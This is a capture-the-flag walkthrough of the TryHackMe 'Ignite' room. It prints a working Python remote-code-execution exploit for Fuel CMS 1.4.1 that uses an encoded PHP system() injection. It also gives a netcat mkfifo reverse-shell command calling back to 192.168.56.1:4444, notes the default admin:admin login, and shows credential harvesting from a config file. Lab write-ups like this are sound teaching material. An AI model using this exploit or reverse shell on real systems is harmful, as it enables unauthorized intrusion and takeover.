Continue the series of writing up interesting challenges on Tryhackme. The challenge this time I writeup with you is Ignite.
Join the channel Telegram of the AnonyViet 👉 Link 👈 |
A little Writeup about the Ignite challenge
Nmap
We can see two ports in the nmap scan but only port 80 is open, the other port is filtered so we can ignore it. Discover what port 80 has.
HTTP
I think this is a new kind of CMS system because I have never seen it used in any other vulnerable system.
During the nmap scan, we can see that file robots.txt
there are several data entries.
When I try to access /fuel
then I found this login screen.
Since we don’t have any credentials we can’t log into the site, so we’ll need to find some workaround.
What comes to mind is is that the default login? And I was right, the login is admin:admin
but I found out I don’t need them.
Just change the plan, I’m looking for information about fuel
above searchsploit
and found the RCE for the version 1.4.1
Next is to download the exploit and change line 14 to URL = “http://10.0.0.130/” ie IP of the machine.
Here is the exploit:
import requests import urllib URL = "http://10.0.0.130/" def find_nth_overlapping(haystack, needle, n): start = haystack.find(needle) while start >= 0 and n > 1: start = haystack.find(needle, start+1) n -= 1 return start while 1: xxxx = input('cmd:') url = URL+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27" r = requests.get(url) html = "<!DOCTYPE html>" htmlcharset = r.text.find(html) begin = r.text[0:20] dup = find_nth_overlapping(r.text,begin,2) print(r.text[0:dup])
Run the exploit and enter the input.
NOTE: Make sure the input command is in “” ie when you run the exploit you will have to enter the command you want to execute. Example: Suppose you want to run ls then you must type cmd: “ls” and not cmd: ls. Note that the command must be enclosed in quotation marks.
Since we already know RCE, it is easy to get everse shell. Run the following command to get the reverse shell:
cmd:"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4444 >/tmp/f"
This command will give you a reverse shell on your listener that will listen on port 4444 via nc -nlvp 4444
Now we can get the flag from the home directory.
Escalation of privileges
Since we’re on the victim machine, let’s try running the enum command to see if we can find anything. You can use the word wget to load the enum file from your system onto the machine.
After searching for a while, I found the root password at: /var/www/html/fuel/application/config/database.php
root: mememe
Okay we just found the password for the root user and now we can change our account to root
by command su
.
Then you just get the root flag from /root
.
summary
Ignite is a pretty good challenge for beginners from @Darkstar and @lollava. If you are a beginner then I recommend you to play the Ignite challenge.
Alternatively, you can also solve Shodan.io on Tryhackme here.